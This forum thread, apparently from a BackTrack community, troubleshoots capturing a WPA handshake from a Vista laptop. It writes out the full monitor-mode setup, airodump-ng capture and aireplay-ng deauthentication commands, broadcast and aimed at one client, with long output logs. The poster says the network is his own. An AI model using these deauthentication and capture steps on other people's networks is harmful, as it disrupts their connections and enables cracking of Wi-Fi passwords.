Results 1 to 6 of 6

Thread: No WPA handshake for Vista Client :(

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    3

    Default No WPA handshake for Vista Client :(

    Hello from a newbie

    I'm not sure why, but I can not seem to capture handshakes from a Vista client.

    I'm using BT3 and a Hawking HWUG1... it works fine when I use aireplay-ng against my phone, just not my vista client. Not sure what I am doing wrong... Here is what I am doing:

    modprobe -r rt73
    modprobe rt73
    ifconfig rausb0 up
    iwpriv rausb0 forceprism 1
    iwpriv rausb0 rfmontx 1
    iwconfig rausb0 mode monitor

    And just to be sure I am in monitor mode, I do again

    airmon-ng stop rausb0
    airmon-ng start rausb0

    airodump-ng rausb0

    From this I filter on my AP, so I get:

    airodump-ng -c 6 --bssid my_AP_bssid rausb0

    (Yes my AP is on channel 6)

    On another terminal I use

    aireplay-ng -0 10 -a my_AP_bssid rausb0

    But... no handshake

    This works flawlessly with my phone, and even without the aireplay if I just listen passively. Just not with my Vista computer. And the AP and clients are within the same room, so I know distance is not a problem. Has anyone experienced this, or even know why this would be the case??

    Also, I check whether I have a handshake or not by simply running aircrack-ng, which promptly informs me that I have not captured any handshakes...

    Thanks heaps from a newbie (please don't burn me if I have stated something stupid :S )

  2. #2
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default

    Quote Originally Posted by alexinnippon View Post
    Hello from a newbie

    I'm not sure why, but I can not seem to capture handshakes from a Vista client.

    I'm using BT3 and a Hawking HWUG1... it works fine when I use aireplay-ng against my phone, just not my vista client. Not sure what I am doing wrong... Here is what I am doing:

    modprobe -r rt73
    modprobe rt73
    ifconfig rausb0 up
    iwpriv rausb0 forceprism 1
    iwpriv rausb0 rfmontx 1
    iwconfig rausb0 mode monitor

    And just to be sure I am in monitor mode, I do again

    airmon-ng stop rausb0
    airmon-ng start rausb0

    airodump-ng rausb0

    From this I filter on my AP, so I get:

    airodump-ng -c 6 --bssid my_AP_bssid rausb0

    (Yes my AP is on channel 6)

    On another terminal I use

    aireplay-ng -0 10 -a my_AP_bssid rausb0

    But... no handshake

    This works flawlessly with my phone, and even without the aireplay if I just listen passively. Just not with my Vista computer. And the AP and clients are within the same room, so I know distance is not a problem. Has anyone experienced this, or even know why this would be the case??

    Also, I check whether I have a handshake or not by simply running aircrack-ng, which promptly informs me that I have not captured any handshakes...

    Thanks heaps from a newbie (please don't burn me if I have stated something stupid :S )
    Hmm. I think you've got the steps down OK, especially when you report that your phone is getting de-auth'ed. Perhaps it's Vista's default behaviour NOT to automatically re-associate when it gets knocked off?

    Also, I want you to post the output from your command:
    Code:
    aireplay-ng -0 10 -a my_AP_bssid rausb0
    What I expect to see is the number of de-auth acknowledgements aireplay reports. Can you post this?

    I'm thinking you in fact did de-auth the Vista box, but tell us if the box is still connected to your AP. If not, Vista knows it got de-auth'ed and wont immediately re-connect.

    Does that make sense? Try again and report back.

    Best Regards.
    You. Are. Doing. It. Wrong.
    -Gitsnik

  3. #3
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Unless one specifies vista to reconnect when a connection is dropped it will not. That is the default setting.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  4. #4
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    3

    Default

    Thanks for the quick reply

    Quote Originally Posted by kidFromBigD View Post
    Also, I want you to post the output from your command:
    You can see below the output of aireplay-ng:

    Code:
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& rausb0
    18:53:14  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    18:53:14  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:15  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:16  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:16  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:17  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:18  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:18  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:19  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:20  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    18:53:21  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    bt ~ #
    I'm thinking you in fact did de-auth the Vista box, but tell us if the box is still connected to your AP. If not, Vista knows it got de-auth'ed and wont immediately re-connect.
    Unfortunately, the Vista machine just ignores the deauth completely and remains connected. I know this for sure, as I can continue to use the network on it without any type of disruption.

    My suspicion is that it somehow hides the handshake, as I cant even see it when I just listen passively while trying to connect the Vista machine to the AP.

    Also I had forgot to mention earlier, that the same commands work also perfectly when I try to deauth a Windows XP machine. That gets disconnected straight away, and I can see a handshake coming in (same deal when I just listen passively).

    Just in case you need it, I have attached a "working" handshake capture from an XP machine being deauthenticated:

    Code:
     CH  6 ][ BAT: 2 hours 35 mins ][ Elapsed: 32 s ][ 2009-07-15 18:57 ][ WPA handshake: 00:&&:&&:&&
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:&&:&&:&&:&&:&&  113  81      256       62    1   6  54. WPA2 CCMP   PSK  M&&&&
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    
     00:&&:&&:&&:&&:&&  00:&&:&&:&&:&&:&&   81  54- 2     0       32
    
    bt ~ #
    Thanks for your help

  5. #5
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default

    Quote Originally Posted by alexinnippon View Post
    Thanks for the quick reply
    <snip>

    Thanks for your help
    The plot thickens.

    Notice the output of your aireplay-ng command:
    Code:
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& rausb0
    18:53:14  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    18:53:14  Sending DeAuth to broadcast -- BSSID: [00:&&:&&:&&:&&:&&]
    I've added boldface font... It's telling you to try the -c flag and de-auth a particular client. Right now, you're blasting out de-auths to everyone connected to the AP. Should work, right? Works for your phone and your XP client. Still ... can you try once more and post your output? Try using this command:
    Code:
    aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ rausb0
    Where:
    Code:
    -c 00:$$:$$:$$:$$:$$
    Is the MAC address of the Vista client.

    I'm asking you to do this since aireplay-ng will in fact tell you how many acknowledgements it detected after each de-auth it sent out. I'm expecting to see the Vista client ack the de-auth(s).

    Again, hopefully I'm making sense here.

    Let us know how it goes.
    You. Are. Doing. It. Wrong.
    -Gitsnik

  6. #6
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    3

    Default

    Hmm... you see I was trying to play the role of a would be hacker, who didnt know the mac of my Vista machine. And from reading around, I understood that using aireplay-ng without specifying the client would lead to the client being revealed, after which you can direct a deauth to it. This technique works when I try against the XP machine and the phone... the mac address pops up, but actually there is no need to even attempt another deauth as a handshake comes seconds after. But since since the Vista machine is also mine and I know the mac I can give it a shot, no probs.

    In any case, something very interesting is going on... here is why. While i was messing around with different combinations, I ran airodump-ng, and this time, I could see the Vista client's mac address... so I tried the deauth (without specifying the client mac), and I think it dropped me (I was managing the AP at the time, and it asked me to re-enter the username and password). So after this, I was expecting to see a handshake come in, but that never happened, and I was back onto the AP web manager and I could browse through the different settings., and even checked the attached devices, and I could see the mac address of my Vista machine.

    Now things get even more stranger... so I think, ok let me try with specifying the client mac... so I do, and as you can see below, I get 0 Acks. But then i decide maybe its the Hawking, so I tried with another wireless card I have (Dlink DWA-652) and you can see I get at least some ACKS... Could it be drivers (I have used rt73-k2wrlz-3.0.3)? I would not have thought so, because it works with the XP client, and the phone...
    Also, no matter what the combination, and whether I get acks or not, I never see a hanshake coming in...

    Also, sometimes aireplay-ng just seems to sit there saying "waiting for beacon frame" when I can see the beacon count going up fast. What does that mean?

    After messing around with both adapters for a while it seems I at least get some acks with the Dlink, but never with the Hawking.

    This is really confusing :S

    Code:
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ rausb0
    19:02:55  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:02:55  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:02:56  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:02:57  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:02:58  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:02:59  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:00  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:02  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:03  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:04  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:05  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:03:14  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 10
    
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:03:39  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:03:39  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 3 ACKs]
    19:03:40  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:41  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:42  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:43  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:44  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:45  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:46  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:47  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:03:48  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:03:50  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ rausb0
    19:04:09  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:04:09  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:10  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:11  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:13  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:14  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:15  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:16  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:17  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:18  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:04:19  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:04:28  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ ath0
    19:05:28  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:05:29  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:30  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:31  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:40  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0|13 ACKs]
    19:05:41  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:42  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:50  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0|10 ACKs]
    19:05:50  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 1 ACKs]
    19:05:52  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:05:53  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ # aireplay-ng -0 10 -a 00:&&:&&:&&:&&:&& -c 00:$$:$$:$$:$$:$$ rausb0
    19:06:19  Waiting for beacon frame (BSSID: 00:&&:&&:&&:&&:&&) on channel 6
    19:06:20  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:21  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:23  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:24  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:26  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:27  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:29  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:30  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:32  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    19:06:33  Sending 64 directed DeAuth. STMAC: [00:$$:$$:$$:$$:$$] [ 0| 0 ACKs]
    bt ~ #
    Thanks heaps for all your help.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •